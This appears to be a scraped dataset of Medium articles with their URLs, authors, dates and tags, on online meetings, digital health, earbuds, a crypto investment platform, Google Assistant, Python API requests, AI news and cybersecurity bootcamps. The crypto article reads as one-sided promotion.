The challenge is when you’re setting up projects and you’ve got a team discussion where you’re reviewing comments on a committee draft, or a document that requires some in-depth conversation. That’s not just routine. The convenor and the facilitators have to have personal skills. How do we do that online? Do we make some smaller groups? For example, if a national committee has a number of issues with how something is been drafted, do I actually meet with them first? Because in a large group you might find that they’re not speaking up and some other country is dominating the discussion.
So, it may be that we structure the way we do it differently and I think we’re going to learn a lot of this kind of thing this year. I’m excited about what we can learn. But we’ve really got to look after our people. That’s what I wrote to my Technical Committee, TC 106, just prior to our meeting. We are a virtual family. We’ve got to look out for ourselves, look after ourselves and support each other through this.
Q: In practical terms, what does “supporting each other” mean?
A: If you look at the IEC and the experts, we’ve got regulators, we’ve got test houses, we’ve got operators, and we’ve got academia. We come from diverse backgrounds, but we’re a global family. In the meetings we had recently, we had every single continent represented. It means respecting that. We’re experiencing the COVID-19 issues and lockdowns differently. Our emotions are going to be very different. I sometimes wake up wondering what’s going on in this world. It’s taking me a while to come to grips with what’s actually happening. In Australia, we’re very, very lucky with our current situation. I look at the US, I look at Europe and it’s so different.
Then, when you talk to people, you can tell that some people are just feeling really down about being locked in an apartment, or not being able to see their family. But when you’ve got these virtual meetings, we don’t need to talk only about the technical content. We can just park that for a bit and ask someone how they’re doing. We can have a separate discussion and reach out to them. They are our connected family. So to me, that’s probably the most important thing.
If we can help people in that journey, then they’ll want to be part of the ongoing discussions. Some people might switch off and say that they’re doing voluntary work and it will have to take a backseat. And that’s fine if it happens, but how can we help?
It’s our great IEC family first. Then it’s about not trying to do as much as we normally do in our meetings but kicking off with the tasks that we can do and prioritizing. I think in some cases we may achieve more! Convenors need to step back and think about how they’re going to get their projects to work with these circumstances. You might not have all the answers, so reach out to another convenor. We — the technical committee chairs and the other group chairs — can leverage some of this information and share it. | https://medium.com/e-tech/learning-how-to-make-online-meetings-more-engaging-f889ffad1293 | ['Mike Mullane'] | 2020-06-09 13:30:37.599000+00:00 | ['Management', 'Covid 19', 'Technology', 'Zoom', 'Online Meetings'] |
131 | Five Stories to Refresh Your Digital Health Knowledge Before the Global Digital Health Forum 2016 | The annual Global Digital Health Forum is just around the corner. Now is the time to brush up on some of the trends in digital health thought leadership and programming.
Here are five stories written by staff from the Knowledge for Health (K4Health) Project that will keep you informed on conversations happening at the Forum this year:
Earlier this year, K4Health’s Digital Health Team shared why they view knowledge management as an essential tool for fostering country ownership of digital health.
2. K4Health IT Director Guy Chalk (guychalk) demystifies open-source software and discusses why it’s important for international development.
3. Lisa Mwaikambo, K4Health’s Director of Knowledge Management Integration, shares lessons she learned implementing a closed user group platform for health providers in Tanzania to share technical health content.
4. Program Specialist Amy Lee explores a common assumption that women have less access and are less likely to use internet technology and finds out it isn’t always true.
5. Sarah V. Harlan, K4Health’s Learning Director, reminds us to focus should on the people our policies and programs affect first, regardless of how incredible or simple a technology solution might seem. | https://medium.com/the-exchange-k4health/five-stories-to-refresh-your-digital-health-knowledge-before-the-global-digital-health-forum-2016-76303d0b52c1 | ['Knowledge For Health'] | 2016-12-12 20:23:22.496000+00:00 | ['Knowledge Management', 'Gdhf2016', 'Digital Health', 'Health Technology', 'Global Health'] |
132 | I Tried Knock-Off Apple AirPods | Photo by Howard Bouchevereau on Unsplash
I wanted to know if Apple AirPods are really worth the investment. So, I tried a pair of knock-off wireless earbuds to see how they measured up. Here’s what I discovered.
The knock-off earbuds have a cheaper, less luxurious feel
When I opened up my package of $35 True Wireless Ear Buds, I immediately noticed that both the earbuds and the plastic casing have a cheaper feel to them. The plastic is thinner and it feels flimsier overall than the Apple AirPods. However, for the cost, this was to be expected, and it wouldn’t be a deal-breaker for me.
The charging cases and earbuds are almost identical in style
Side by side view of my Apple AirPods (left) and my pink knock-off wireless earbuds
When you look at the two pairs side by side, there are very few differences. The front of the charging case for the knock-off earbuds has four indicator dots to show how charged up the case is. The AirPods have a single indicator dot on the interior of the case which indicates whether the charging case is fully charged or not.
The knock-off earbuds come in a variety of colors. I chose baby pink, but they also offered classic white, which looks identical to the AirPods. There is a button on the back of the AirPods case which helps the earbuds pair with your device. Everything else looks pretty much the same. Both sets of earbuds connect magnetically into the charging case.
Side by side view of the back of the charging cases
The sound quality between the two pairs is noticeably different
Not unexpectedly, the sound quality of the Apple AirPods is noticeably superior to the knock-offs. I used each pair on a number of runs outside, and the exterior noise was louder with the knock-off earbuds, especially on days when it was windy. However, taking into account that there is a $100+ difference in cost between the two pairs, I was actually surprised that the sound quality of the knock-off pair was as good as it was. The earbuds never lost signal or cut in and out. The sound quality was simply not as clean nor as smooth as that of the AirPods. Even so given the price, the sound quality of the knock-offs was acceptable.
Side by side view of the earbuds
The AirPods show the percent battery life left
This feature is one that I wish my knock-off headphones would have had. The AirPods indicate the percentage charged for each earbud on your paired device. For example, when you open up the Apple AirPods charging case, the percent charge of each earbud shows up on your phone screen. With the knock-off earbuds I purchased, there is no way of knowing how charged up they are. My knock-off earbuds have actually died a few times while I was out running because I failed to charge them up and was unaware that they needed recharging.
There are some key differences in the specifications
Now, let’s take a deeper dive into the specifications of the Apple AirPods (I have version 1) vs. the knock-off earbuds (True Wireless Ear Buds). Both the AirPods and the knock-off earbuds have automatic on/off and pairing capabilities. They both have touch controls for the phone and music. They each support up to 5 hours of listening time for a single charge and transmit up to about 30 feet. However, there are some differences. The AirPods charge about 4 times as fast. They take only 15 minutes to charge up enough for 3 hours of listening time, whereas the knock-offs take 1–2 hours to charge. The AirPods have access to Siri. Finally, the audio and noise-cancelling capabilities of the AirPods are superior to that of the True Wireless Ear Buds. All of these added features are what elevate the Apple AirPods above other less expensive wireless earbuds on the market.
Knock-off earbuds package specifications
So, what’s my final verdict?
The Apple AirPods are undeniably a superior pair of headphones. However, if you are not super picky about sound quality and don’t need all of the extra bells and whistles, then a knock-off pair of headphones will work just fine for you. They’ll also save you a lot of money. What it really comes down to is your personal preference and how much use you think you’ll get out of them. If you plan to use them every day, then it may be worth investing in the Apple AirPods. Otherwise, I think you could be perfectly happy buying a decent pair of knock-offs and saving yourself $100. | https://medium.com/adventures-in-consumer-technology/i-tried-knock-off-apple-airpods-dadb13ab483 | ['Alyssa Atkinson'] | 2020-05-18 14:24:17.085000+00:00 | ['Apple', 'Business', 'Tech', 'Electronics', 'Technology'] |
133 | How to Easily Invest in the Cryptocurrency Market | Despite the cryptocurrency market continuing its rapid growth process in 2018, the industry still has a wall of problems to break down between its current state and successful, widespread public adoption. These issues stem from the prevalence of fraudulent ICO’s, frequent security breaches and the inefficient nature of current ‘on-ramps’ from traditional fiat currency into cryptocurrency. Participation in the cryptocurrency market in its current state remains a high-risk, high-reward endeavour without the possession of exceptional technical and financial skills. While ETFs and licensed financial advisors provide solutions to these problems in traditional markets, no entity currently exists in the cryptocurrency space that offers bespoke, risk-optimised portfolios to the retail market. Until Automata.
U.K-based fintech company Automata seeks to address the problems that I have laid out above and have consequentially created a product that allows anyone, from farmer to fund manager, to invest in the surging cryptocurrency market. The beauty of Automata is found in its elegant simplicity. Automata does not require the exchange of cryptocurrencies, nor does it limit users to a highly restricted selection of cryptocurrencies as is currently seen with major companies that specialise in fiat to cryptocurrency ‘on-ramping’. Users simply create an account, answer a short series of questions in order to allow Automata to create a personalised risk profile and you’re ready to invest. Deposits can take the form of a one-off investment or can be scheduled to suit the user’s personal preference, which is a testament to Automata’s focus on developing a product that is not only easy to use, but also consumer-minded. Additionally, deposits can be as little as £1 and adjusted simply if a user’s preference changes over time. When put into a cryptocurrency context, it becomes clear just how important a user-friendly project like Automata is in finally achieving the widespread adoption of cryptocurrency to the global public.
While the interface and transaction framework must be applauded for its ease of use, the technical element to what Automata achieves is far from simplistic. Automata uses a range of fundamental, technical and analysis of overarching market forces to formulate a proprietary algorithm capable of outperforming traditional investment strategies in both bull and more importantly, bear markets. It does so by adjusting individual user’s risk exposure depending on the overarching market trend, with an investment having a greater exposure to a greater number of cryptocurrencies in an established bull trend and a smaller level of exposure to cryptocurrencies (and therefore a higher percentage held in stable cryptocurrencies and fiat currency) in the event of an identifiable bear trend. This algorithm has been tested extensively by the Automata team in traditional markets, where it experienced great success but also in the cryptocurrency market where it showed an ability to outperform standard market strategies by upwards of 80% in an established bear trend. As mentioned previously this ability to mitigate risk and protect a client’s investment is not insignificant in a cryptocurrency market that is dually highly volatile and rampant with attempted fraud. In this respect, Automata is essentially unique as it dramatically reduces the potential downside of any capital outlay, to the point where traditionally frugal investors, renowned for being reluctant to move any money from traditional blue-chip stocks should be attracted in entering the cryptocurrency market. As a result, it would be logical to suggest that Automata could act as the true catalyst required for mass retail investment into the cryptocurrency space and a significant step towards enabling the financial independence of those who may not have otherwise had the opportunity in traditional markets.
Automata’s current roadmap suggests that this disruption isn’t as far away as might be expected. The Alpha version of Automata’s platform has been completed and the Beta version is currently in testing, with an eye to releasing the completed desktop version in Q3 of 2018 and the fully operational smartphone application by Q4 2018. In addition to this, the comprehensive whitepaper is in the final stages of editing and due for dissemination in the coming weeks. This whitepaper will outline the token economics of the Automata project in detail, as well as explaining more about the trading platform itself. If rumours are to be believed, the incoming whitepaper will also reveal that Automata is seeking to create an environment in which users can track leading portfolio manager’s investment choices and replicate them to mirror their own personal portfolios through a specialty smart contract. Leading portfolio managers will set their own fees and be rewarded in Automata’s native token if they have success.
The cryptocurrency market is not easy. The possibility for high-upside investing is not without its inevitable counter side lurking darkly around the corner. The revolutionary blockchain technology that lays the foundation for cryptocurrencies however, is an opportunity that simply cannot be missed. Automata takes this high-risk, highly liquid and immature cryptocurrency market and simplifies it. Suddenly, instead of having to navigate exchange after exchange (and the fees that come them), with Automata users have a tailored, risk managed platform that allows users to access all of this at the tips of their fingers and without the notable security risks that come with trading individually. Automata is a brilliant solution to one of the cryptocurrency’s biggest existing problems. | https://medium.com/automatalive/how-to-easily-invest-in-the-cryptocurrency-market-de3cc72e4022 | [] | 2018-06-26 13:46:16.116000+00:00 | ['Investment', 'Technology', 'Fintech', 'Cryptocurrency', 'Bitcoin'] |
134 | Loom PlasmaChain Staking เปิด Live แบบเต็มรูปแบบ! — การ Stake ให้กับ LOOM และเพิ่มความปลอดภัยให้กับ PlasmaChain | in Both Sides of the Table | https://medium.com/loom-network-thai/loom-plasmachain-staking-%E0%B9%84%E0%B8%94%E0%B9%89%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94-live-%E0%B9%81%E0%B8%9A%E0%B8%9A%E0%B9%80%E0%B8%95%E0%B9%87%E0%B8%A1%E0%B8%A3%E0%B8%B9%E0%B8%9B%E0%B9%81%E0%B8%9A%E0%B8%9A%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%9A-%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B8%B3-stake-%E0%B9%83%E0%B8%AB%E0%B9%89%E0%B8%81%E0%B8%B1%E0%B8%9A-loom-de1a9de73e83 | ['Loom Network Thai'] | 2019-03-01 04:25:53.757000+00:00 | ['Blockchain', 'Cryptocurrency', 'Ethereum', 'Technology', 'Bitcoin'] |
135 | Learn how to turn off your Google Assistant | Learn how to turn off your Google Assistant
Google Assistant is one of the most feature-rich virtual assistants in the world. This assistant is always ready on every Android phone, tablet and Google Home series device to help the user in their daily work. However, not everyone wants to use Google Assistant, so there is no need to spend on mobile charges just behind the device’s RAM and processor. In that case, Google Assistant can be turned off if you want.
To turn off Assistant, first go to the Google app on the phone. Then you have to click on the three bar button in the upper right corner in the More option. Then go to settings. From there you have to select Google Assistant. Then scroll down, touch the General option. Then you have to remove the tick mark of Google Assistant option from there. Google will present some warning messages to the users, there is no problem in avoiding them. Bus, Google Assistant on the phone and the microphone on the phone for the word ‘OK Google’ all the time will be off.
However, if Google Assistant is not completely shut down, just clicking ‘OK Google’ detection or the home button can stop the appearance of Google. Google Assistant can be turned on for no reason, such as detecting another word as ‘OK Google’ or putting an unwanted pressure on the home button, which can be embarrassing. In that case you have to go to the phone’s settings menu. From there go to apps or application options and go to default applications option. After removing the Google Assistant from the Device Assistant option and selecting the ‘Gharhub’ option, Google Assistant will no longer appear after hearing a call or pressing a button.
The benefits of turning off the assistant can be found in older devices more than in newer devices. For devices running Snapdragon 400 or 800 series processors or the phone is more than three years old, the devices may consume extra battery due to the assistant. Google Assistant has a hand in reducing battery life, especially on standby. So it is better to turn off | https://medium.com/@lotbd/learn-how-to-turn-off-your-google-assistant-9a8cc65f59c5 | ['Lot Bd'] | 2021-02-22 10:26:52.335000+00:00 | ['Technology', 'Technology News', 'Google Analytics', 'Google Assistant', 'Google'] |
136 | How to Get Data from APIs with Python 🐍 | It’s a bit of a cliche to say that data is the new oil. I like to think of it more as a renewable resource like wind.💨 Whatever energy source you choose as your metaphor, you want to harness some of its power! ⚡️
Ideally, you have direct access to the data you want in a file or a database you control. When that’s not the case, if you’re lucky, the data will be available through a public-facing an API. ☘️
In this article, I’ll show you the steps to get the data from a public API using Python. 🐍 First I’ll show you how and where to look for a Python API wrapper and share the largest repository of Python API wrappers. 🎉
Then I’ll show you how to use the requests library to get the data you want from an API that doesn’t have a Python wrapper.
If the data you want is on a website, but not available through a public-facing API, there are several options for scraping it. When to use which scraping package is a whole other article I have in the works. Follow me to make sure you don’t miss it! 😁
Let’s drill down!
Already drilled. Source: pixabay.com
APIs
An external facing Application Programming Interface (API) is often intended to provide data in large chunks. You just need to know how to work with the API.
An organization creates a public-facing API with the intent that you use it. Their motivations vary from idealistic to mercenary and might include the following:
Hoping you’ll build something that will improve the world. 🌍 Hoping you’ll use their free plan and then need so much data or need the data so frequently you’ll pay them for access to more data. 💵 Figuring you’ll scrape the data from the website if they don’t give you a direct line to it, so they might as well reduce their server overhead and make your experience better. 😀
APIs can be documented well, poorly, or somewhere in between. If you’re lucky, they are well-documented. If you’re really lucky there is a Python wrapper for the API that works and is well documented. 🎉
Finding Python API Wrappers
It can be tricky to find Python wrappers for the API you need. Here’s my suggested approach.
List of Python API Wrappers
I am maintaining what I believe is the largest list of Python API wrappers over at GitHub. Real Python made a nice list that was forked and updated by johnwmiller. I cleaned the list up a bit and then, given that coronavirus quarantine ended my children’s ability to earn money from soccer refereeing ⚽️ and cat sitting 🐈, I paid them to help improve the list. We updated and augmented this outdated list because I couldn’t find a good list of functioning API wrappers elsewhere. 😀
If you find a Python API wrapper that is missing from the list, please edit the ReadMe file and submit a pull request. Here’s a quick guide to editing GitHub Markdown files in the GUI, if you’re new to this:
Click the pencil icon in the right corner and make changes (here’s a lovely Markdown tutorial if you need it). Then click the green Propose file change button at the bottom of the page. Then click on the green Create pull request button, summarize the changes, and click on the green Create pull request button at the bottom. Thank you! 🎉
FYI, I often highlight Python packages on my Data Awesome mailing list. In the next installment I’ll be highlighting yfinance by Ran Aroussi. yfinance wraps the Yahoo Finance API. You can use it to read stock market data into a pandas DataFrame with one line of code. 🚀
If the Python API wrapper list doesn’t have what you need, I suggest you use the usual method for finding things on the interwebs. 🕸
Google it
A good search engine is a developer or data scientist’s best friend 😁
Specifically, I would search for Python wrapper the_name_of_the_api_I’m_looking_for. GitHub links are likely to be the most fruitful. If a repo hasn’t been updated in the past several years or has been archived, your odds of being able to successfully use the wrapper aren’t high. In that case, I suggest you keep looking. 👓
Check the API website
If you’re lucky, the website for the API you are using might list wrappers available in various programming languages. It’s worth a try. 😃
Using an API Directly
When there isn’t an API wrapper, you have toto query the API directly. I suggest you use the Python requests library.
Use Requests
The venerable requests library is the battle-tested way to get information from an API. Requests was created by Kenneth Reitz and is protected by the Python Software Foundation. It’s the most downloaded Python package as of this writing. 👍
Install requests into your environment from the command line with pip install requests
Then import it and use it. Use the HTTP verbs get and post as methods to return the information you desire. Mostly, you’ll use get. Here’s how to query the GitHub API:
import requests r = requests.get('https://api.github.com/events')
You can pass parameters to the get method as a dictionary. Here’s the quick start guide.
You’ll often get back JSON when you make a get request. You can use the requests .json() method to change JSON into a dictionary quickly.
my_dict = r.json()
Refining data queries with requests is much faster than refining oil 😀Source: pixabay.com
Requests uses the urllib3 library under the hood and enhances it. There are other libraries you could use, but requests is super solid, is nice to use, and is familiar to most Python coders. I suggest you use requests whenever you want to make an API call and the API doesn’t have a Python wrapper.
Speaking of which, if your favorite API doesn’t have a Python wrapper, I encourage you to considering making one. 👍
Making a Python API Wrapper 🛠
Making a an API wrapper is a great way to learn Python packaging skills. Here’s a guide I wrote to get you started with making a Python package and releasing it on PyPi.
I created Pybraries, a Python wrapper for the Libraries.io API. Making it was a great learning experience, and it was cool to give back to the open source community that I’ve benefited from. 🚀
Other Things You Should Know abut APIs
API keys, rate limits, and cURL are three other terms you should be familiar with.
API keys 🗝
You’ll often need an API key to query the API. The API docs should make it clear how you can procure a key. Most of the time, you can get one for free by signing up at the website of the organization whose data you want. If you want a lot of data or want it frequently, you might have to pay for the privilege.
Keys. Source: pixabay.com
You can store your API key in an environment variable. Here’s a guide for setting up environment variables on Mac, Linux, and Windows. Environment variable names are ALL CAPS by convention. Speaking of all caps:
⚠️ DO NOT, UNDER ANY CIRCUMSTANCES, STORE AN API KEY IN GITHUB OR ANOTHER PUBLICLY ACCESSIBLE ONLINE VERSION CONTROL SYSTEM. ⚠️
Your key could get stolen and abused — especially if your account has a credit card attached to it. ☹️
To access the environment variable that holds your API key in Python, import the os module and get the value from the dictionary with the key that matches the name of your environment variable. For example:
import os os.environ.get('MYENVIRONMENTVARIABLE')
This code returns the value of your MYENVIRONMENTVARIABLE environment variable.
If you will be using your key in applications on the cloud, you should look into secrets management, as discussed here.
Speaking of staying out of trouble, let’s discuss rate limits.
Rate Limits
Need to limit it. 😲Source: pixabay.com
Many APIs limit how many times you can ping them in a given amount of time to avoid needing to pay for lots of extra servers. To avoid going over these limits, you can use the Python time library and put your request into a loop. For example, here’s a brief snippet of code that waits for five seconds between requests.
import time
import requests t = 0
my_url = 'https://example.com' while t < 100:
r = requests.get(my_url)
time.sleep(5) # wait five seconds
t += 1
print(r.json())
The point of this code is to show you how you can use time.sleep() to avoid nonstop API endpoint pings that might push you over a rate limit. In a real use case, you would probably want to save your data in some way and use a try…except block.
cURL
This is a guide for using Python with APIs, but you should know that you can query an API from the command line with the popular cURL program. cURL is included on Macs and machines running recent Windows 10 versions by default. If you want to learn cURL, I suggest you check out the free ebook Conquering the Command Line, by Mark Bates. 🚀
Recap
If you want to get data from an API, try to find a Python wrapper first. Check out the list of Python wrappers here. Google search if that fails, and check out the API website. If you find a Python wrapper missing from my list on GitHub please add it. 😀
If there isn’t a Python wrapper for an API, use the requests library. If you have the time, consider creating a wrapper so all Python users can benefit. ❤️
Don’t forget to keep your API keys safe and avoid hitting rate limits. 🔑
Wrap
You’ve learned a workflow for finding and using APIs with Python. You’re on your way to getting the data you need to do awesome things! 🚀
I hope you found this guide to using APIs with Python useful. If you did, please share it on your favorite social media so other folks can find it, too. 👍
I write about Python, SQL, Docker, data science, and other tech topics. If any of that’s of interest to you, follow me and read more here. 😀 | https://towardsdatascience.com/how-to-get-data-from-apis-with-python-dfb83fdc5b5b | ['Jeff Hale'] | 2020-05-03 12:36:42.933000+00:00 | ['Technology', 'Python', 'Data Science', 'Programming', 'Towards Data Science'] |
137 | Artificial Intelligence: Week #52 | 2020 | Artificial Intelligence: Week #52 | 2020
Happy Holidays from Sixgill:
As many of us will be full of holiday cheer next week, this will be our last weekly AI post of 2020. Thank you for reading, and I hope you’ve enjoyed staying up to date on artificial intelligence and machine learning with us. We look forward to posting in the new year!
Enjoy our 12 Days of Labeling Holiday Video:
Use promo code: HOLIDAY2020 to get 60 days free of Sense Data Annotation. No card required.
Photo by Derek Truninger on Unsplash
Artificial Intelligence News:
Listen to this deep learning model jam out in an infinite bass solo on a youtube live stream. The model was trained by dadabots on an original two hour improvised bass solo by Adam Neely. I’m ready for more interesting new AI music.
Deepmind continues to push the boundaries of what’s capable with AI. MuZero can learn to play games like go, chess, shoghi, and atari without even being told what the rules are. MuZero can navigate unknown environments and develop strategies that fit. This is a major milestone in Deepmind’s pursuit of general purpose AI algorithms.
Learn how this robot can overcome issues and be adaptive to new environments with something called “Hebbian Learning”
Check out some thoughts published on forbes about what’s to come in 2021 for the AI field. | https://medium.com/plainsight/artificial-intelligence-week-52-2020-36d012edcec1 | ['Sage Elliott'] | 2020-12-23 23:37:53.423000+00:00 | ['Artificial Intelligence', 'Technology News', 'AI', 'Machine Learning', 'Deep Learning'] |
138 | McDonald’s, Spherical Cows, and iTunes: A Defense on Behalf of Bootcamp Instructors & Thoughts on Modular Education | I sometimes participate in an alumni Discord server, where we recently had a bit of heated debate regarding the value of our bootcamp program and what we wish could have been different. Two major themes were:
The training on its own was not sufficient/rigorous enough to make us “job-ready” relative to the inflated expectations of the hiring market. The career paths laid out, “penetration tester” and “SOC analyst” and “Red Team” vs “Blue Team” felt binary in an industry that is filled with niches.
I would like to take some time to exercise some empathy on behalf of our instructors who have been taking a lot of flak as well as suggest an alternative that might be a compromise between student and shareholder value.
お任せ — “I’ll Leave it up to You”
Jiro Dreams of Sushi
This is literally what you are asking for when you order o-makase, the prix fixe of sushi. The chef and their staff are sourcing fish by season and market conditions, and you are leaving your dining experience at their discretion.
When you choose to attend a security, web development/UX, or data science bootcamp, that is essentially what you’re doing. You can, of course, take individual classes on how to write Python or how to conduct a penetration test, just like you can choose to order sushi a la carte or make it yourself if you wish. But if you’re considering a bootcamp, like I did, most likely you are admitting that you do not have the Herculean research and self-discipline abilities to bootstrap yourself from ground zero to a job.
But that’s ok, because most of us don’t. It’s likely why, even though you can have some flexibility in the classes you can enroll in, university curriculums are fairly fixed in a way to guide you through the path you need. Don’t give into the survivorship bias of those who brag about figuring things out by themselves — no one is telling the story about how they burned out on their own and gave up.
So if you have the cash or are game to take on loans (like someone paying with credit card at Sushi Nakazawa), you can accept the help of veteran industry professionals who have taken the time to craft a curriculum for the average student who likely knows close to nothing. Getting somewhere at a cost is often better than nowhere, depending on your needs and contraints.
I left it up to the faculty at Fullstack Academy, and I’m better off for it.
The “Tyranny” of the Majority (or Neoliberalism)
The hidden double edge in this Faustian pact lies in the fact that to serve the business growth needs of an investor-backed enterprise, the product offering must appeal to as wide of a market as possible. And who is this market?
Those who want to change careers quickly, with little/no prior background, at a lower cost than an undergraduate/graduate program.
In the eyes of the shareholders, we (prospective bootcamp students) are not some struggling inner-city high schoolers reaching for a better future by learning AP Calculus — we are a statistic that makes the Series A/B/C funding worth it. It’s a data-driven world, and money makes it go ‘round.
McDonald’s has a robust research program and could well produce a Michelin-starred burger. But it doesn’t, because it can make a lot more money with an easy to reproduce product that hits the spot and is cost-effective for the buyer and seller. Similarly, I’m sure a bootcamp program could aspire to the standard of 1970’s Berkeley, but it would be naïve to pursue such a vision unless it was a sponsored nonprofit/academic center.
Imagine our needs/constraints laid out on a bell curve. In a given sample/population, there will be some of us with more or less time to spend studying full-time, technical aptitude, etc. The majority of the group will cluster around the average (X̄).
The “Bell Curve”, or Normal Distribution. Image by Julie Bang © Investopedia 2019
Let’s assume you are the next Kevin Mitnick and you breeze through all your courses because you are a .1%’er. You demand that the curriculum be adapted to your needs, otherwise it’s a waste of your time and money.
Assume now in our dramatized hypothetical, that your instructors agree and pivot towards having everyone learn how to write assembler code instead of that Mickey-Mouse Python. Most of your classmates cannot learn this overnight, and end up failing the course or dropping out. The program’s reputation, while impressive to an old-school elite, drives students that would have otherwise done fine in the old curriculum towards a more beginner-friendly competitor.
On the flip side, we might also see a “No Child Left Behind” situation where a desire to let more students complete a program results in the more advanced students feeling frustrated and the remainder ill-equipped to find an actual job.
Real-world instructors in for-profit schools thus face a dilemma: they must craft and sell an appealing dream (working in tech), but one that is attainable for the average student and profitable for the company. It is not a surprise, then, that the general modus operandi is to make a cohort of students close to hirable in approximately one business quarter, then rinse and repeat. As long as most students can find a job within 3 months to a year, it’s a job well done.
As mentioned earlier, this is probably a satisfactory deal for a good amount of people. I wouldn’t have seen myself becoming job-ready within half a year just studying on my own — there is plenty of value in guided instruction at a rigorous pace accompanied by peer accountability. It wasn’t a 4 year CS program, but that’s not what I paid for either. A bootcamp guarantees not a job at the end of the tunnel, but a foundational skillset that you can build upon, provided you put the work in yourself.
Explain Like I’m Five
Consider the infosec vendor/services landscape:
And this certification progression chart:
How would you approach these with a greenhorn who only knows how to vaguely ask, “How can I get into cybersecurity”? Would you really go through each nitty gritty section, knowing that they don’t have the context to understand? Let’s face it — unless they already have a background in IT, Software Engineering/Devops or Intelligence, it’s going to be difficult for someone to immediately understand nuances like security engineering vs architecture, threat hunting vs incident response.
There’s an academic joke I enjoy about how physicists like to model the world:
There is this dairy with cows and everything. The dairy farmer wants to increase his production of milk. To do this, he hires three consultants — an engineer, a psychologist, and a physicist. After a week, the engineer comes back with a report. He said: “If you want to increase milk production, you need to get bigger milk pumps and bigger tubes to suck the milk through.” Next came the psychologist. He said: “You nee to make the cows produce more milk. One way to do this is to make them calm and happy. Happy cows produce happy milk. Paint the milking stalls green. This will make the cows think of grass and happy fields. They will be happy.” Finally, the physicist came to present her ideas. She said: “Assume the cow is a sphere….”
Although silly, this reminds me how models that “look” wrong (in this case, grossly oversimplified) can still be useful for understanding how things work. Too much information and complexity can be overload for someone with no pre-existing mental models, and while an over-simplification may be “wrong” in a technical sense, it can actually be useful in a pedagogical one.
If you’re like my instructors, you’d try to ELIF (explain like I’m five) and paint broad brushstrokes in the “Blue Team vs Red Team” dichotomy — a grown-up version of Cops & Robbers. SOC (Security Operations Center) Analyst and Penetration tester are fine starting point examples of what a career on each side might look like, and are a vivid illustration of the adversarial nature of InfoSec. This is enough complexity, in my opinion, for a pure beginner.
Let’s take a detour to the screencap below. Anyone who has done the Penetration Testing with Kali Linux or Hack the Box labs should find it easy to comprehend, but we could not expect the same from a complete novice. Knowledge has to build upon itself.
Command line output like this felt intimidating until my instructors taught me about well-known ports and the OSI model, how to interact with sockets, etc. It was necessary to first start off with necessary blocks of knowledge to build upon, despite it seeming trivial afterwards. In the same way, the crude early understanding of SOC and penetration testing roles provided clear paths of skill development that could fork later on. I believe that learning fundamentals in this “simplified” world helped insulate my early learning from noise and rabbit holes (it is very easy in security to fall into these).
Show Me The Money
Perhaps due to my business background, I come off as a sellout by empathizing with the bootcamp business rather than advocating for students. You may argue that it’s easy for me to take this position because I already have a job, and you‘re probably right.
But I consider myself and our alumni adults that entered a business transaction, not a moral contract, and believe it’s more productive to think about what could be rather than what should have been.
I’ve already discussed my thoughts on why the bootcamp experience (as it is) must by necessity disappoint certain people. In my opinion, this is more a failure of framework/mindset than curriculum planning — by trying to use a one-size-fits-all classroom, bootcamps have ended up with a satisficing solution rather than one that addresses diverse needs optimally.
Given that bootcamps want to grow revenue and students want different experiences, how can we arrive at a win-win?
Portfolio Diversification
Many moons ago when I worked in advertising, I had a client that manufactured cell phones. Their goal was to occupy a larger market share within the US, but they were struggling to compete with Samsung as an Android device.
After weeks of strategy sessions and brainstorming, we had to point out that their strategy of focusing on the early adopter techie crowd was actually driving themselves into a corner. What Apple and Samsung understood very well was that there is a place for ultra-luxe, flagship, and budget models, each one fitting the needs and wants of a subsection of the market.
The bootcamp experience as it stands is a bit like buying Model T Ford: “You can have any color as long as it’s black". The one concession I’ve seen is part-time programs for those who can’t afford to quit their jobs, but realistically they are not so different curriculum-wise.
The iTunes Model
There’s a saying that there’s two ways to make money — you either bundle things together or “unbundle” them to sell individual pieces. iTunes disrupted the record industry by making it possible to buy individual tracks rather than the whole album.
What is ironic in the battle between bootcamps vs higher education is that while bootcamps are “disruptive” in focusing on expedited practical training, they are also backwards in insisting on bundling the entire curriculum together. In an undergraduate program, on the other hand, you can choose to fulfill a math obligation with pre-calculus or linear algebra depending on your level of expertise. And if you have enough AP credits or have transferred, you don’t even need to have 4 whole years of school.
Provided that there are enough students in the classroom, why couldn’t we have the same for bootcamps?
Conveyer-Belt Sushi
It’s not o-makase quality, but conveyer-belt sushi is an experience in choice. You can be a heathen and eat only California rolls, or you can pick and choose whatever flavors pique your interest. You can also eat as little or as much as you’d like, provided the plate you’re looking for is available.
This model, in my opinion, stands to help bootcamps maximize revenue potential by fulfilling needs it could not with the current format, allowing:
Inexperienced/undecided students to test the waters with a preparatory/foundations course rather than commit to a huge purchase
Slower learners to take more time than the fast pace of the normal bootcamp allows
Fast learners to participate in more rigorous versions of the same topics, satisfying their intellectual needs
Those with prior foundational experience to specialize (like college majors) in niches like digital forensics, web application testing, etc. (upsell to existing students, and you can bring in adjuncts on contract)
Seasonal workers to fit learning in when life allows for it
Strong self-learners to work through self-paced material and labs without instructor/peer support (curation of materials is their core need)
Perhaps even more importantly, this model would support the reality that a career in tech involves lifelong learning, not just a one-time program.
Completing a bootcamp program is not the goal in itself — it’s to get a person tangibly closer to their career change/progression needs. Bootcamp operators would do well to provide modular options that stand to reach a longer tail of customers by fitting their needs more closely. | https://medium.com/atelier-de-s%C3%A9curit%C3%A9/mcdonalds-spherical-cow-and-itunes-a-defense-on-behalf-of-bootcamp-instructors-thoughts-on-c12c24f42df8 | ['Kevin Huang'] | 2020-12-18 21:22:34.531000+00:00 | ['Careers', 'Bootcamp', 'Career Advice', 'Career Change', 'Technology'] |
139 | Communication.JPG: The Bilingualism of Gen Z | Will this produce a more visually articulate generation? Charlotte, 20, New York City.
